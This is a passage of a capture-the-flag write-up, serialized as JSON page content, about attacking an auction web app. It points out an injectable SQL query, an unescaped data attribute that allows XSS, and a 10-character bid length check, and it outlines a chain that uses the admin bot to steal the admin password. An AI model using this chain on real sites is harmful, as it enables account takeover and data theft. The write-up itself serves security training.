`",{"type":33,"tag":128,"props":5712,"children":5713},{"style":140},[5714],{"type":38,"value":5715},"SELECT * FROM \"",{"type":33,"tag":128,"props":5717,"children":5718},{"style":1576},[5719],{"type":38,"value":5720},"${",{"type":33,"tag":128,"props":5722,"children":5723},{"style":140},[5724],{"type":38,"value":5725},"tableName",{"type":33,"tag":128,"props":5727,"children":5728},{"style":1576},[5729],{"type":38,"value":5730},"}",{"type":33,"tag":128,"props":5732,"children":5733},{"style":140},[5734],{"type":38,"value":669},{"type":33,"tag":128,"props":5736,"children":5737},{"style":676},[5738],{"type":38,"value":5739},"`",{"type":33,"tag":128,"props":5741,"children":5742},{"style":312},[5743],{"type":38,"value":5676},{"type":33,"tag":128,"props":5745,"children":5746},{"class":130,"line":804},[5747],{"type":33,"tag":128,"props":5748,"children":5749},{"emptyLinePlaceholder":896},[5750],{"type":38,"value":899},{"type":33,"tag":128,"props":5752,"children":5753},{"class":130,"line":839},[5754,5759,5764],{"type":33,"tag":128,"props":5755,"children":5756},{"style":312},[5757],{"type":38,"value":5758},"    [..",{"type":33,"tag":128,"props":5760,"children":5761},{"style":306},[5762],{"type":38,"value":5763},"SNIP",{"type":33,"tag":128,"props":5765,"children":5766},{"style":312},[5767],{"type":38,"value":5768},"...]\n",{"type":33,"tag":128,"props":5770,"children":5771},{"class":130,"line":848},[5772],{"type":33,"tag":128,"props":5773,"children":5774},{"emptyLinePlaceholder":896},[5775],{"type":38,"value":899},{"type":33,"tag":128,"props":5777,"children":5778},{"class":130,"line":976},[5779,5783,5788,5792,5797,5802,5806,5811],{"type":33,"tag":128,"props":5780,"children":5781},{"style":300},[5782],{"type":38,"value":5696},{"type":33,"tag":128,"props":5784,"children":5785},{"style":306},[5786],{"type":38,"value":5787}," 
results",{"type":33,"tag":128,"props":5789,"children":5790},{"style":312},[5791],{"type":38,"value":5657},{"type":33,"tag":128,"props":5793,"children":5794},{"style":1576},[5795],{"type":38,"value":5796}," await",{"type":33,"tag":128,"props":5798,"children":5799},{"style":135},[5800],{"type":38,"value":5801}," runReadOnlyQuery",{"type":33,"tag":128,"props":5803,"children":5804},{"style":312},[5805],{"type":38,"value":5566},{"type":33,"tag":128,"props":5807,"children":5808},{"style":306},[5809],{"type":38,"value":5810},"query",{"type":33,"tag":128,"props":5812,"children":5813},{"style":312},[5814],{"type":38,"value":5815},");\n",{"type":33,"tag":128,"props":5817,"children":5818},{"class":130,"line":988},[5819,5824,5828,5832,5837,5842,5846,5851,5855,5859],{"type":33,"tag":128,"props":5820,"children":5821},{"style":306},[5822],{"type":38,"value":5823},"    res",{"type":33,"tag":128,"props":5825,"children":5826},{"style":312},[5827],{"type":38,"value":215},{"type":33,"tag":128,"props":5829,"children":5830},{"style":135},[5831],{"type":38,"value":633},{"type":33,"tag":128,"props":5833,"children":5834},{"style":312},[5835],{"type":38,"value":5836},"({",{"type":33,"tag":128,"props":5838,"children":5839},{"style":437},[5840],{"type":38,"value":5841}," success",{"type":33,"tag":128,"props":5843,"children":5844},{"style":312},[5845],{"type":38,"value":284},{"type":33,"tag":128,"props":5847,"children":5848},{"style":1576},[5849],{"type":38,"value":5850}," true",{"type":33,"tag":128,"props":5852,"children":5853},{"style":312},[5854],{"type":38,"value":5584},{"type":33,"tag":128,"props":5856,"children":5857},{"style":306},[5858],{"type":38,"value":5787},{"type":33,"tag":128,"props":5860,"children":5861},{"style":312},[5862],{"type":38,"value":5863}," 
});\n",{"type":33,"tag":128,"props":5865,"children":5866},{"class":130,"line":1001},[5867],{"type":33,"tag":128,"props":5868,"children":5869},{"style":312},[5870],{"type":38,"value":845},{"type":33,"tag":128,"props":5872,"children":5873},{"class":130,"line":1014},[5874,5879,5883],{"type":33,"tag":128,"props":5875,"children":5876},{"style":312},[5877],{"type":38,"value":5878},"  [..",{"type":33,"tag":128,"props":5880,"children":5881},{"style":306},[5882],{"type":38,"value":5763},{"type":33,"tag":128,"props":5884,"children":5885},{"style":312},[5886],{"type":38,"value":5768},{"type":33,"tag":128,"props":5888,"children":5889},{"class":130,"line":1026},[5890],{"type":33,"tag":128,"props":5891,"children":5892},{"style":323},[5893],{"type":38,"value":5894},"  \n",{"type":33,"tag":128,"props":5896,"children":5897},{"class":130,"line":1038},[5898],{"type":33,"tag":128,"props":5899,"children":5900},{"style":312},[5901],{"type":38,"value":5902},"});\n",{"type":33,"tag":47,"props":5904,"children":5905},{},[5906],{"type":38,"value":5907},"The idea now would be to use the bot to retrieve the unencrypted admin password in order to then exploit the SQL injection",{"type":33,"tag":40,"props":5909,"children":5911},{"id":5910},"xss-unintended",[5912],{"type":38,"value":5913},"XSS [UNINTENDED]",{"type":33,"tag":47,"props":5915,"children":5916},{},[5917,5919,5925],{"type":38,"value":5918},"To execute actions on the bot, we need a primitive that would allow us to execute code on the bot's browser, in other words, an XSS. 
We can see in the template that renders the auction details that the ",{"type":33,"tag":105,"props":5920,"children":5922},{"className":5921},[],[5923],{"type":38,"value":5924},"safe",{"type":38,"value":5926}," filter is applied to the auction JSON written into the data-auction attribute. This filter disables the template engine's output escaping, so attacker-controlled auction fields land in the single-quoted attribute unescaped, and a single quote in an auction field is enough to break out of it.
-->\n",{"type":33,"tag":128,"props":5971,"children":5972},{"class":130,"line":765},[5973,5978,5983,5988,5992,5996,6001,6005,6010,6014,6018,6023,6027,6032,6036,6041,6046,6050,6055],{"type":33,"tag":128,"props":5974,"children":5975},{"style":312},[5976],{"type":38,"value":5977},"\u003C",{"type":33,"tag":128,"props":5979,"children":5980},{"style":1576},[5981],{"type":38,"value":5982},"div",{"type":33,"tag":128,"props":5984,"children":5985},{"style":306},[5986],{"type":38,"value":5987}," id",{"type":33,"tag":128,"props":5989,"children":5990},{"style":312},[5991],{"type":38,"value":315},{"type":33,"tag":128,"props":5993,"children":5994},{"style":676},[5995],{"type":38,"value":669},{"type":33,"tag":128,"props":5997,"children":5998},{"style":140},[5999],{"type":38,"value":6000},"auction-details-panel",{"type":33,"tag":128,"props":6002,"children":6003},{"style":676},[6004],{"type":38,"value":669},{"type":33,"tag":128,"props":6006,"children":6007},{"style":306},[6008],{"type":38,"value":6009}," class",{"type":33,"tag":128,"props":6011,"children":6012},{"style":312},[6013],{"type":38,"value":315},{"type":33,"tag":128,"props":6015,"children":6016},{"style":676},[6017],{"type":38,"value":669},{"type":33,"tag":128,"props":6019,"children":6020},{"style":140},[6021],{"type":38,"value":6022},"rpg-panel",{"type":33,"tag":128,"props":6024,"children":6025},{"style":676},[6026],{"type":38,"value":669},{"type":33,"tag":128,"props":6028,"children":6029},{"style":306},[6030],{"type":38,"value":6031}," data-auction",{"type":33,"tag":128,"props":6033,"children":6034},{"style":312},[6035],{"type":38,"value":315},{"type":33,"tag":128,"props":6037,"children":6038},{"style":676},[6039],{"type":38,"value":6040},"'",{"type":33,"tag":128,"props":6042,"children":6043},{"style":140},[6044],{"type":38,"value":6045},"{{ auction | dump | safe 
}}",{"type":33,"tag":128,"props":6047,"children":6048},{"style":676},[6049],{"type":38,"value":6040},{"type":33,"tag":128,"props":6051,"children":6052},{"style":312},[6053],{"type":38,"value":6054},">",{"type":33,"tag":128,"props":6056,"children":6057},{"style":5541},[6058],{"type":38,"value":6059}," \u003C!-- \u003C-- INJECTION -->\n",{"type":33,"tag":128,"props":6061,"children":6062},{"class":130,"line":804},[6063,6068,6072,6076,6080,6084,6089,6093],{"type":33,"tag":128,"props":6064,"children":6065},{"style":312},[6066],{"type":38,"value":6067},"  \u003C",{"type":33,"tag":128,"props":6069,"children":6070},{"style":1576},[6071],{"type":38,"value":5982},{"type":33,"tag":128,"props":6073,"children":6074},{"style":306},[6075],{"type":38,"value":6009},{"type":33,"tag":128,"props":6077,"children":6078},{"style":312},[6079],{"type":38,"value":315},{"type":33,"tag":128,"props":6081,"children":6082},{"style":676},[6083],{"type":38,"value":669},{"type":33,"tag":128,"props":6085,"children":6086},{"style":140},[6087],{"type":38,"value":6088},"panel-header",{"type":33,"tag":128,"props":6090,"children":6091},{"style":676},[6092],{"type":38,"value":669},{"type":33,"tag":128,"props":6094,"children":6095},{"style":312},[6096],{"type":38,"value":6097},">\n",{"type":33,"tag":128,"props":6099,"children":6100},{"class":130,"line":839},[6101,6106,6111,6115,6119,6123,6128,6132,6137,6141],{"type":33,"tag":128,"props":6102,"children":6103},{"style":312},[6104],{"type":38,"value":6105},"    \u003C",{"type":33,"tag":128,"props":6107,"children":6108},{"style":1576},[6109],{"type":38,"value":6110},"i",{"type":33,"tag":128,"props":6112,"children":6113},{"style":306},[6114],{"type":38,"value":6009},{"type":33,"tag":128,"props":6116,"children":6117},{"style":312},[6118],{"type":38,"value":315},{"type":33,"tag":128,"props":6120,"children":6121},{"style":676},[6122],{"type":38,"value":669},{"type":33,"tag":128,"props":6124,"children":6125},{"style":140},[6126],{"type":38,"value":6127},"fa-solid 
fa-gavel",{"type":33,"tag":128,"props":6129,"children":6130},{"style":676},[6131],{"type":38,"value":669},{"type":33,"tag":128,"props":6133,"children":6134},{"style":312},[6135],{"type":38,"value":6136},">\u003C/",{"type":33,"tag":128,"props":6138,"children":6139},{"style":1576},[6140],{"type":38,"value":6110},{"type":33,"tag":128,"props":6142,"children":6143},{"style":312},[6144],{"type":38,"value":6097},{"type":33,"tag":128,"props":6146,"children":6147},{"class":130,"line":848},[6148,6152,6156,6160,6164,6168,6173,6177,6181,6186,6191,6195],{"type":33,"tag":128,"props":6149,"children":6150},{"style":312},[6151],{"type":38,"value":6105},{"type":33,"tag":128,"props":6153,"children":6154},{"style":1576},[6155],{"type":38,"value":40},{"type":33,"tag":128,"props":6157,"children":6158},{"style":306},[6159],{"type":38,"value":6009},{"type":33,"tag":128,"props":6161,"children":6162},{"style":312},[6163],{"type":38,"value":315},{"type":33,"tag":128,"props":6165,"children":6166},{"style":676},[6167],{"type":38,"value":669},{"type":33,"tag":128,"props":6169,"children":6170},{"style":140},[6171],{"type":38,"value":6172},"panel-title",{"type":33,"tag":128,"props":6174,"children":6175},{"style":676},[6176],{"type":38,"value":669},{"type":33,"tag":128,"props":6178,"children":6179},{"style":312},[6180],{"type":38,"value":6054},{"type":33,"tag":128,"props":6182,"children":6183},{"style":323},[6184],{"type":38,"value":6185},"Auction Details",{"type":33,"tag":128,"props":6187,"children":6188},{"style":312},[6189],{"type":38,"value":6190},"\u003C/",{"type":33,"tag":128,"props":6192,"children":6193},{"style":1576},[6194],{"type":38,"value":40},{"type":33,"tag":128,"props":6196,"children":6197},{"style":312},[6198],{"type":38,"value":6097},{"type":33,"tag":128,"props":6200,"children":6201},{"class":130,"line":976},[6202,6207,6211],{"type":33,"tag":128,"props":6203,"children":6204},{"style":312},[6205],{"type":38,"value":6206},"  
\u003C/",{"type":33,"tag":128,"props":6208,"children":6209},{"style":1576},[6210],{"type":38,"value":5982},{"type":33,"tag":128,"props":6212,"children":6213},{"style":312},[6214],{"type":38,"value":6097},{"type":33,"tag":128,"props":6216,"children":6217},{"class":130,"line":988},[6218],{"type":33,"tag":128,"props":6219,"children":6220},{"style":323},[6221],{"type":38,"value":6222},"  [...SNIP...]\n",{"type":33,"tag":128,"props":6224,"children":6225},{"class":130,"line":1001},[6226,6230,6234],{"type":33,"tag":128,"props":6227,"children":6228},{"style":312},[6229],{"type":38,"value":6190},{"type":33,"tag":128,"props":6231,"children":6232},{"style":1576},[6233],{"type":38,"value":5982},{"type":33,"tag":128,"props":6235,"children":6236},{"style":312},[6237],{"type":38,"value":6097},{"type":33,"tag":128,"props":6239,"children":6240},{"class":130,"line":1014},[6241],{"type":33,"tag":128,"props":6242,"children":6243},{"style":323},[6244],{"type":38,"value":6245},"{% endblock %}\n",{"type":33,"tag":47,"props":6247,"children":6248},{},[6249],{"type":38,"value":6250},"We will explain in more detail why the injection is possible:",{"type":33,"tag":239,"props":6252,"children":6253},{},[6254,6276,6311],{"type":33,"tag":243,"props":6255,"children":6256},{},[6257,6266,6268,6274],{"type":33,"tag":2302,"props":6258,"children":6259},{},[6260],{"type":33,"tag":105,"props":6261,"children":6263},{"className":6262},[],[6264],{"type":38,"value":6265},"{{ auction }}",{"type":38,"value":6267},": Injects the ",{"type":33,"tag":105,"props":6269,"children":6271},{"className":6270},[],[6272],{"type":38,"value":6273},"auction",{"type":38,"value":6275}," variable into the template.",{"type":33,"tag":243,"props":6277,"children":6278},{},[6279,6288,6290,6295,6297,6302,6304,6310],{"type":33,"tag":2302,"props":6280,"children":6281},{},[6282],{"type":33,"tag":105,"props":6283,"children":6285},{"className":6284},[],[6286],{"type":38,"value":6287},"dump",{"type":38,"value":6289},": Unserializes 
",{"type":33,"tag":105,"props":6291,"children":6293},{"className":6292},[],[6294],{"type":38,"value":6273},{"type":38,"value":6296}," to ",{"type":33,"tag":2302,"props":6298,"children":6299},{},[6300],{"type":38,"value":6301},"JSON",{"type":38,"value":6303},". It's like ",{"type":33,"tag":105,"props":6305,"children":6307},{"className":6306},[],[6308],{"type":38,"value":6309},"JSON.stringify(auction)",{"type":38,"value":215},{"type":33,"tag":243,"props":6312,"children":6313},{},[6314,6323,6325,6330,6332,6337,6339,6344,6346,6352,6354,6360,6362],{"type":33,"tag":2302,"props":6315,"children":6316},{},[6317],{"type":33,"tag":105,"props":6318,"children":6320},{"className":6319},[],[6321],{"type":38,"value":6322},"safe",{"type":38,"value":6324},": Indicates that the content is \"safe\" and ",{"type":33,"tag":2302,"props":6326,"children":6327},{},[6328],{"type":38,"value":6329},"prevents HTML escaping",{"type":38,"value":6331},". Without ",{"type":33,"tag":105,"props":6333,"children":6335},{"className":6334},[],[6336],{"type":38,"value":6322},{"type":38,"value":6338},", the ",{"type":33,"tag":105,"props":6340,"children":6342},{"className":6341},[],[6343],{"type":38,"value":669},{"type":38,"value":6345}," and ",{"type":33,"tag":105,"props":6347,"children":6349},{"className":6348},[],[6350],{"type":38,"value":6351},"&lt;",{"type":38,"value":6353}," would be transformed to ",{"type":33,"tag":105,"props":6355,"children":6357},{"className":6356},[],[6358],{"type":38,"value":6359},"&quot;",{"type":38,"value":6361}," or ",{"type":33,"tag":105,"props":6363,"children":6365},{"className":6364},[],[6366],{"type":38,"value":6367},"&l",{"type":33,"tag":47,"props":6369,"children":6370},{},[6371,6373,6378],{"type":38,"value":6372},"By analyzing the injection, we can easily guess that it's possible to break the HTML by adding a ",{"type":33,"tag":105,"props":6374,"children":6376},{"className":6375},[],[6377],{"type":38,"value":6040},{"type":38,"value":6379}," which will make us escape the 
single-quoted attribute. However, if we try to inject an XSS payload, the server returns an error indicating that our input is too long.",{"type":33,"tag":75,"props":6381,"children":6383},{"imgSrc":6382},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743103061/writeups/aurors-archive/to_long_error.webp",[],{"type":33,"tag":47,"props":6385,"children":6386},{},[6387],{"type":38,"value":6388},"By analyzing in more detail why this error occurs, we can see that a length check is performed on the submitted bid in the backend code.",{"type":33,"tag":114,"props":6390,"children":6391},{"lang":5526},[6392],{"type":33,"tag":119,"props":6393,"children":6395},{"className":5530,"code":6394,"language":5526,"meta":8,"style":8},"router.post('/auctions/:id/bids', isAuthenticated, async (req, res) => {\n  try {\n    const auctionId = req.params.id;\n    const userId = req.session.userId;\n    const { bid } = req.body;\n\n    if (bid.length > 10) { // \u003C-- CHECK THE LENGTH\n      return res.status(400).json({ success: false, message: 'Too long' });\n    }\n    await placeBid(auctionId, userId, bid);\n    return res.json({ success: true });\n  } catch (err) {\n    console.error('Error placing bid:', err);\n    const status = err.message.includes('Invalid') ? 400\n                  : (err.message.includes('not found') || err.message.includes('closed')) ? 404\n                  : 500;\n    return res.status(status).json({ success: false, message: err.message || 'Internal server error.' 
});\n  }\n});\n",[6396],{"type":33,"tag":105,"props":6397,"children":6398},{"__ignoreMap":8},[6399,6476,6487,6529,6571,6611,6618,6666,6753,6761,6803,6843,6873,6920,6989,7098,7114,7210,7217],{"type":33,"tag":128,"props":6400,"children":6401},{"class":130,"line":131},[6402,6406,6410,6414,6418,6422,6427,6431,6435,6440,6444,6448,6452,6456,6460,6464,6468,6472],{"type":33,"tag":128,"props":6403,"children":6404},{"style":306},[6405],{"type":38,"value":5552},{"type":33,"tag":128,"props":6407,"children":6408},{"style":312},[6409],{"type":38,"value":215},{"type":33,"tag":128,"props":6411,"children":6412},{"style":135},[6413],{"type":38,"value":5561},{"type":33,"tag":128,"props":6415,"children":6416},{"style":312},[6417],{"type":38,"value":5566},{"type":33,"tag":128,"props":6419,"children":6420},{"style":676},[6421],{"type":38,"value":6040},{"type":33,"tag":128,"props":6423,"children":6424},{"style":140},[6425],{"type":38,"value":6426},"/auctions/:id/bids",{"type":33,"tag":128,"props":6428,"children":6429},{"style":676},[6430],{"type":38,"value":6040},{"type":33,"tag":128,"props":6432,"children":6433},{"style":312},[6434],{"type":38,"value":5584},{"type":33,"tag":128,"props":6436,"children":6437},{"style":306},[6438],{"type":38,"value":6439}," 
isAuthenticated",{"type":33,"tag":128,"props":6441,"children":6442},{"style":312},[6443],{"type":38,"value":5584},{"type":33,"tag":128,"props":6445,"children":6446},{"style":300},[6447],{"type":38,"value":5598},{"type":33,"tag":128,"props":6449,"children":6450},{"style":312},[6451],{"type":38,"value":2852},{"type":33,"tag":128,"props":6453,"children":6454},{"style":306},[6455],{"type":38,"value":5607},{"type":33,"tag":128,"props":6457,"children":6458},{"style":312},[6459],{"type":38,"value":5584},{"type":33,"tag":128,"props":6461,"children":6462},{"style":306},[6463],{"type":38,"value":5616},{"type":33,"tag":128,"props":6465,"children":6466},{"style":312},[6467],{"type":38,"value":2966},{"type":33,"tag":128,"props":6469,"children":6470},{"style":312},[6471],{"type":38,"value":5625},{"type":33,"tag":128,"props":6473,"children":6474},{"style":312},[6475],{"type":38,"value":762},{"type":33,"tag":128,"props":6477,"children":6478},{"class":130,"line":362},[6479,6483],{"type":33,"tag":128,"props":6480,"children":6481},{"style":1576},[6482],{"type":38,"value":5684},{"type":33,"tag":128,"props":6484,"children":6485},{"style":312},[6486],{"type":38,"value":762},{"type":33,"tag":128,"props":6488,"children":6489},{"class":130,"line":403},[6490,6494,6499,6503,6507,6511,6516,6520,6525],{"type":33,"tag":128,"props":6491,"children":6492},{"style":300},[6493],{"type":38,"value":5696},{"type":33,"tag":128,"props":6495,"children":6496},{"style":306},[6497],{"type":38,"value":6498}," 
auctionId",{"type":33,"tag":128,"props":6500,"children":6501},{"style":312},[6502],{"type":38,"value":5657},{"type":33,"tag":128,"props":6504,"children":6505},{"style":306},[6506],{"type":38,"value":5662},{"type":33,"tag":128,"props":6508,"children":6509},{"style":312},[6510],{"type":38,"value":215},{"type":33,"tag":128,"props":6512,"children":6513},{"style":306},[6514],{"type":38,"value":6515},"params",{"type":33,"tag":128,"props":6517,"children":6518},{"style":312},[6519],{"type":38,"value":215},{"type":33,"tag":128,"props":6521,"children":6522},{"style":306},[6523],{"type":38,"value":6524},"id",{"type":33,"tag":128,"props":6526,"children":6527},{"style":312},[6528],{"type":38,"value":5676},{"type":33,"tag":128,"props":6530,"children":6531},{"class":130,"line":739},[6532,6536,6541,6545,6549,6553,6558,6562,6567],{"type":33,"tag":128,"props":6533,"children":6534},{"style":300},[6535],{"type":38,"value":5696},{"type":33,"tag":128,"props":6537,"children":6538},{"style":306},[6539],{"type":38,"value":6540}," 
userId",{"type":33,"tag":128,"props":6542,"children":6543},{"style":312},[6544],{"type":38,"value":5657},{"type":33,"tag":128,"props":6546,"children":6547},{"style":306},[6548],{"type":38,"value":5662},{"type":33,"tag":128,"props":6550,"children":6551},{"style":312},[6552],{"type":38,"value":215},{"type":33,"tag":128,"props":6554,"children":6555},{"style":306},[6556],{"type":38,"value":6557},"session",{"type":33,"tag":128,"props":6559,"children":6560},{"style":312},[6561],{"type":38,"value":215},{"type":33,"tag":128,"props":6563,"children":6564},{"style":306},[6565],{"type":38,"value":6566},"userId",{"type":33,"tag":128,"props":6568,"children":6569},{"style":312},[6570],{"type":38,"value":5676},{"type":33,"tag":128,"props":6572,"children":6573},{"class":130,"line":765},[6574,6578,6582,6587,6591,6595,6599,6603,6607],{"type":33,"tag":128,"props":6575,"children":6576},{"style":300},[6577],{"type":38,"value":5696},{"type":33,"tag":128,"props":6579,"children":6580},{"style":312},[6581],{"type":38,"value":5642},{"type":33,"tag":128,"props":6583,"children":6584},{"style":306},[6585],{"type":38,"value":6586}," 
bid",{"type":33,"tag":128,"props":6588,"children":6589},{"style":312},[6590],{"type":38,"value":5652},{"type":33,"tag":128,"props":6592,"children":6593},{"style":312},[6594],{"type":38,"value":5657},{"type":33,"tag":128,"props":6596,"children":6597},{"style":306},[6598],{"type":38,"value":5662},{"type":33,"tag":128,"props":6600,"children":6601},{"style":312},[6602],{"type":38,"value":215},{"type":33,"tag":128,"props":6604,"children":6605},{"style":306},[6606],{"type":38,"value":5671},{"type":33,"tag":128,"props":6608,"children":6609},{"style":312},[6610],{"type":38,"value":5676},{"type":33,"tag":128,"props":6612,"children":6613},{"class":130,"line":804},[6614],{"type":33,"tag":128,"props":6615,"children":6616},{"emptyLinePlaceholder":896},[6617],{"type":38,"value":899},{"type":33,"tag":128,"props":6619,"children":6620},{"class":130,"line":839},[6621,6626,6630,6635,6639,6644,6648,6653,6657,6661],{"type":33,"tag":128,"props":6622,"children":6623},{"style":1576},[6624],{"type":38,"value":6625},"    if",{"type":33,"tag":128,"props":6627,"children":6628},{"style":312},[6629],{"type":38,"value":2852},{"type":33,"tag":128,"props":6631,"children":6632},{"style":306},[6633],{"type":38,"value":6634},"bid",{"type":33,"tag":128,"props":6636,"children":6637},{"style":312},[6638],{"type":38,"value":215},{"type":33,"tag":128,"props":6640,"children":6641},{"style":437},[6642],{"type":38,"value":6643},"length",{"type":33,"tag":128,"props":6645,"children":6646},{"style":312},[6647],{"type":38,"value":2472},{"type":33,"tag":128,"props":6649,"children":6650},{"style":523},[6651],{"type":38,"value":6652}," 10",{"type":33,"tag":128,"props":6654,"children":6655},{"style":312},[6656],{"type":38,"value":2966},{"type":33,"tag":128,"props":6658,"children":6659},{"style":312},[6660],{"type":38,"value":5642},{"type":33,"tag":128,"props":6662,"children":6663},{"style":5541},[6664],{"type":38,"value":6665}," // \u003C-- CHECK THE 
LENGTH\n",{"type":33,"tag":128,"props":6667,"children":6668},{"class":130,"line":848},[6669,6674,6678,6682,6687,6691,6696,6701,6705,6709,6713,6717,6722,6726,6731,6735,6740,6745,6749],{"type":33,"tag":128,"props":6670,"children":6671},{"style":1576},[6672],{"type":38,"value":6673},"      return",{"type":33,"tag":128,"props":6675,"children":6676},{"style":306},[6677],{"type":38,"value":5616},{"type":33,"tag":128,"props":6679,"children":6680},{"style":312},[6681],{"type":38,"value":215},{"type":33,"tag":128,"props":6683,"children":6684},{"style":135},[6685],{"type":38,"value":6686},"status",{"type":33,"tag":128,"props":6688,"children":6689},{"style":312},[6690],{"type":38,"value":5566},{"type":33,"tag":128,"props":6692,"children":6693},{"style":523},[6694],{"type":38,"value":6695},"400",{"type":33,"tag":128,"props":6697,"children":6698},{"style":312},[6699],{"type":38,"value":6700},").",{"type":33,"tag":128,"props":6702,"children":6703},{"style":135},[6704],{"type":38,"value":633},{"type":33,"tag":128,"props":6706,"children":6707},{"style":312},[6708],{"type":38,"value":5836},{"type":33,"tag":128,"props":6710,"children":6711},{"style":437},[6712],{"type":38,"value":5841},{"type":33,"tag":128,"props":6714,"children":6715},{"style":312},[6716],{"type":38,"value":284},{"type":33,"tag":128,"props":6718,"children":6719},{"style":1576},[6720],{"type":38,"value":6721}," false",{"type":33,"tag":128,"props":6723,"children":6724},{"style":312},[6725],{"type":38,"value":5584},{"type":33,"tag":128,"props":6727,"children":6728},{"style":437},[6729],{"type":38,"value":6730}," message",{"type":33,"tag":128,"props":6732,"children":6733},{"style":312},[6734],{"type":38,"value":284},{"type":33,"tag":128,"props":6736,"children":6737},{"style":676},[6738],{"type":38,"value":6739}," '",{"type":33,"tag":128,"props":6741,"children":6742},{"style":140},[6743],{"type":38,"value":6744},"Too 
long",{"type":33,"tag":128,"props":6746,"children":6747},{"style":676},[6748],{"type":38,"value":6040},{"type":33,"tag":128,"props":6750,"children":6751},{"style":312},[6752],{"type":38,"value":5863},{"type":33,"tag":128,"props":6754,"children":6755},{"class":130,"line":976},[6756],{"type":33,"tag":128,"props":6757,"children":6758},{"style":312},[6759],{"type":38,"value":6760},"    }\n",{"type":33,"tag":128,"props":6762,"children":6763},{"class":130,"line":988},[6764,6769,6774,6778,6783,6787,6791,6795,6799],{"type":33,"tag":128,"props":6765,"children":6766},{"style":1576},[6767],{"type":38,"value":6768},"    await",{"type":33,"tag":128,"props":6770,"children":6771},{"style":135},[6772],{"type":38,"value":6773}," placeBid",{"type":33,"tag":128,"props":6775,"children":6776},{"style":312},[6777],{"type":38,"value":5566},{"type":33,"tag":128,"props":6779,"children":6780},{"style":306},[6781],{"type":38,"value":6782},"auctionId",{"type":33,"tag":128,"props":6784,"children":6785},{"style":312},[6786],{"type":38,"value":5584},{"type":33,"tag":128,"props":6788,"children":6789},{"style":306},[6790],{"type":38,"value":6540},{"type":33,"tag":128,"props":6792,"children":6793},{"style":312},[6794],{"type":38,"value":5584},{"type":33,"tag":128,"props":6796,"children":6797},{"style":306},[6798],{"type":38,"value":6586},{"type":33,"tag":128,"props":6800,"children":6801},{"style":312},[6802],{"type":38,"value":5815},{"type":33,"tag":128,"props":6804,"children":6805},{"class":130,"line":1001},[6806,6811,6815,6819,6823,6827,6831,6835,6839],{"type":33,"tag":128,"props":6807,"children":6808},{"style":1576},[6809],{"type":38,"value":6810},"    
return",{"type":33,"tag":128,"props":6812,"children":6813},{"style":306},[6814],{"type":38,"value":5616},{"type":33,"tag":128,"props":6816,"children":6817},{"style":312},[6818],{"type":38,"value":215},{"type":33,"tag":128,"props":6820,"children":6821},{"style":135},[6822],{"type":38,"value":633},{"type":33,"tag":128,"props":6824,"children":6825},{"style":312},[6826],{"type":38,"value":5836},{"type":33,"tag":128,"props":6828,"children":6829},{"style":437},[6830],{"type":38,"value":5841},{"type":33,"tag":128,"props":6832,"children":6833},{"style":312},[6834],{"type":38,"value":284},{"type":33,"tag":128,"props":6836,"children":6837},{"style":1576},[6838],{"type":38,"value":5850},{"type":33,"tag":128,"props":6840,"children":6841},{"style":312},[6842],{"type":38,"value":5863},{"type":33,"tag":128,"props":6844,"children":6845},{"class":130,"line":1014},[6846,6851,6856,6860,6865,6869],{"type":33,"tag":128,"props":6847,"children":6848},{"style":312},[6849],{"type":38,"value":6850},"  }",{"type":33,"tag":128,"props":6852,"children":6853},{"style":1576},[6854],{"type":38,"value":6855}," catch",{"type":33,"tag":128,"props":6857,"children":6858},{"style":312},[6859],{"type":38,"value":2852},{"type":33,"tag":128,"props":6861,"children":6862},{"style":306},[6863],{"type":38,"value":6864},"err",{"type":33,"tag":128,"props":6866,"children":6867},{"style":312},[6868],{"type":38,"value":2966},{"type":33,"tag":128,"props":6870,"children":6871},{"style":312},[6872],{"type":38,"value":762},{"type":33,"tag":128,"props":6874,"children":6875},{"class":130,"line":1026},[6876,6881,6885,6890,6894,6898,6903,6907,6911,6916],{"type":33,"tag":128,"props":6877,"children":6878},{"style":306},[6879],{"type":38,"value":6880},"    
console",{"type":33,"tag":128,"props":6882,"children":6883},{"style":312},[6884],{"type":38,"value":215},{"type":33,"tag":128,"props":6886,"children":6887},{"style":135},[6888],{"type":38,"value":6889},"error",{"type":33,"tag":128,"props":6891,"children":6892},{"style":312},[6893],{"type":38,"value":5566},{"type":33,"tag":128,"props":6895,"children":6896},{"style":676},[6897],{"type":38,"value":6040},{"type":33,"tag":128,"props":6899,"children":6900},{"style":140},[6901],{"type":38,"value":6902},"Error placing bid:",{"type":33,"tag":128,"props":6904,"children":6905},{"style":676},[6906],{"type":38,"value":6040},{"type":33,"tag":128,"props":6908,"children":6909},{"style":312},[6910],{"type":38,"value":5584},{"type":33,"tag":128,"props":6912,"children":6913},{"style":306},[6914],{"type":38,"value":6915}," err",{"type":33,"tag":128,"props":6917,"children":6918},{"style":312},[6919],{"type":38,"value":5815},{"type":33,"tag":128,"props":6921,"children":6922},{"class":130,"line":1038},[6923,6927,6932,6936,6940,6944,6949,6953,6958,6962,6966,6971,6975,6979,6984],{"type":33,"tag":128,"props":6924,"children":6925},{"style":300},[6926],{"type":38,"value":5696},{"type":33,"tag":128,"props":6928,"children":6929},{"style":306},[6930],{"type":38,"value":6931}," 
status",{"type":33,"tag":128,"props":6933,"children":6934},{"style":312},[6935],{"type":38,"value":5657},{"type":33,"tag":128,"props":6937,"children":6938},{"style":306},[6939],{"type":38,"value":6915},{"type":33,"tag":128,"props":6941,"children":6942},{"style":312},[6943],{"type":38,"value":215},{"type":33,"tag":128,"props":6945,"children":6946},{"style":306},[6947],{"type":38,"value":6948},"message",{"type":33,"tag":128,"props":6950,"children":6951},{"style":312},[6952],{"type":38,"value":215},{"type":33,"tag":128,"props":6954,"children":6955},{"style":135},[6956],{"type":38,"value":6957},"includes",{"type":33,"tag":128,"props":6959,"children":6960},{"style":312},[6961],{"type":38,"value":5566},{"type":33,"tag":128,"props":6963,"children":6964},{"style":676},[6965],{"type":38,"value":6040},{"type":33,"tag":128,"props":6967,"children":6968},{"style":140},[6969],{"type":38,"value":6970},"Invalid",{"type":33,"tag":128,"props":6972,"children":6973},{"style":676},[6974],{"type":38,"value":6040},{"type":33,"tag":128,"props":6976,"children":6977},{"style":312},[6978],{"type":38,"value":2966},{"type":33,"tag":128,"props":6980,"children":6981},{"style":300},[6982],{"type":38,"value":6983}," ?",{"type":33,"tag":128,"props":6985,"children":6986},{"style":523},[6987],{"type":38,"value":6988}," 